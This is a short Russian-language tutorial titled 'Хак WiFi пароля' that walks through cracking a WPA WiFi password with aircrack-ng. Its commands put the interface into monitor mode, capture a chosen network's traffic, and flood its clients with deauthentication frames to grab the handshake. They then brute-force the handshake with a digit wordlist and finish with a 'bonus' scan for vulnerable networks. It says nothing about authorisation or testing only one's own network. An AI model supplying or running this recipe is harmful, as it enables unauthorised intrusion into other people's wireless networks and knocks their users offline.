Хак WiFi пароля
- Устанавливаем пакеты:
sudo apt install net-tools sudo apt install aircrack-ng - В первом окне терминала:
даем командуifconfig- смотрим имя нашего wifi интерфейса (wlp2s0);
переводим интерфейс в режим мониторинга (перехвата) пакетов командойsudo airmon-ng start wlp2s0;
еще раз смотрим имя интерфейса (оно изменится, теперь -wlp2s0mon);
запускаем мониторинг (дампинг) пакетовsudo airodump-ng wlp2s0mon;
в верхней половине видим доступные сети с параметрами, в нижней - клиенты; выбираем сеть - копируем ее mac (BSSID) и номер канала (CH).
Чтоб сканить диапазон 5G надо добавить ключ --band ab (короткий вариант -b ab). - Во втором окне терминала:
sudo airodump-ng --bssid 00:00:00:24:AF:00 -c 6 -w WPAcrack wlp2s0mon
где00:00:00:24:AF:00- искомый mac, а 6 - номер канала
тут виден обмен пакетами с искомой точкой раздачи (тоже оставляем запущенным). - В третьем окне терминала принудительно отключим пользователей, чтоб заставить их авторизоваться заново (и перехватить рукопожатие handshake):
sudo aireplay-ng --deauth 100 -a 00:00:00:24:AF:00 wlp2s0mon
если строки не пошли (не попали в нужный канал) - повторяем несколько раз. пока пойдут строки (их будет 100). - Далее ждем когда подключится юзер снова. Это видно во втором терминале. А в первом сверху должна появиться надпись handshake - это значит, что рукопожатие перехвачено и сохранено. Если не произошло - повторить отключение клиентов.
- Далее скачиваем словать паролей и начинаем перебор по словарю. Рукопожатия сохраняются в домашний каталог в файлы типа
WPAcrack-06.capномера меняются по порядку. - В четвертом окне запускаем перебор. К файлу словаря указываем полный путь:
aircrack-ng WPAcrack-06.cap -w /tmp/00000000-99999999.txt
Если перебор пошел - остальные терминалы можно остановить, иначе продолжить перехват рукопожатий. - Для возврата своего вайфая в рабочий режим - надо выполнить
sudo airmon-ng stop wlp2s0mon
Бонус:
поиск сетей, уязвимых к хаку.sudo aireplay-ng -9 wlp2s0mon
